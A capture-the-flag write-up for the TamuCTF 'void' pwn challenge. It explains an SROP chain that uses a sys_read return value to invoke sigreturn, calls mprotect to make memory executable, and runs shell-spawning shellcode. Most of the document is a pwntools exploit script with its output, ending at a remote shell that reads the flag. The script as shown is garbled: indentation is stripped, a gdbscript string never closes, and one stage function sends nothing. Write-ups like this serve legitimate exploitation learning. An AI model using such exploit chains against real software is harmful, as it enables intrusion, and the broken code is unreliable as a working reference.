Tags: rop mprotect srop pwn 

Rating: 5.0

## Solution

I didn't solve this one during TamuCTF but I saw ```sky#0004```'s [solve in Discord](https://discord.com/channels/962465945882853407/965296241846145114/965322156965761054) and went back and relooked at the problem with the benefit of their solution. I based my solution largely on their approach.

I had been stuck on the fact that I needed to call ```sys_mprotect``` to enable RWX permissions. Since there was a ```syscall, ret```, I was hopeful I might be able to ```pop sys_rt_sigreturn (0xf) into rax```, use SROP to call ```sys_mprotect```, and set the ```rdi, rsi, rdx``` registers . However, there were no gadgets to write to rax. I made the mistake of not realizing that ```sys_read``` would return the bytes read into rax.

After figuring that out, putting the exploit together is pretty straightforward. First make ```sys_read``` syscall to set rax=0xf. Next, use SROP for ```sys_mprotect``` and mark the address of the shellcode as RWX. Return in the program's entry, adjust the stack, and execute the shellcode.

from pwn import *
import time

binary = args.BIN

context.terminal = ["tmux", "splitw", "-h"]
e = context.binary = ELF(binary)
r = ROP(e)

gs = '''
break *0x401018

def start():
if args.GDB:
return gdb.debug(e.path, gdbscript=gs)
elif args.REMOTE:
return remote("tamuctf.com", 443, ssl=True, sni="void")
return process(e.path)

p = start()

'''0x401000: mov rax, 0; mov rdi, 0; mov rsi, rsp; mov rdx, 0x7d0; syscall;
rax = sys_read, rdi = fd = stdin, rsi = char* = 'rsp', rdx = len = 0x7d40 '''
sys_read = 0x401000

'''0x401018: syscall; ret'''
syscall_ret = 0x401018

start = 0x400020
entry = 0x400018

'''stack_adjust + shellcode '''
shellcode = asm('add rsp,0x68')
shellcode += asm(shellcraft.sh())

def pause(stage):
print("[+] Pausing Before Sending Stage: %s" %stage)
if args.GDB:
raw_input("[+] Press [Enter] To Send")

def srop_mprotect():
chain = p64(sys_read)
chain += p64(syscall_ret)

frame = SigreturnFrame()
frame.rip = syscall_ret
frame.rsp = entry
frame.rax = constants.SYS_mprotect
frame.rdi = e.address
frame.rsi = len(shellcode)
frame.rdx = 7

p.send(chain + bytes(frame))

def read_15_bytes():
pause("Reading 15 Bytes (rax=0xf=sys_rt_sigreturn) ")

def exec_shellcode():
p.send(p64(start) + shellcode)



Running the exploit returns the flag

python3 pwn-void.py BIN=./void REMOTE
[*] '/root/workspace/tamu-ctf/void/void'
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] Loaded 2 cached gadgets for './void'
[+] Opening connection to tamuctf.com on port 443: Done
[+] Pausing Before Sending Stage: Reading 15 Bytes (rax=0xf=sys_rt_sigreturn)
[+] Pausing Before Sending Stage: Shellcode
[*] Switching to interactive mode
$ cat flag.txt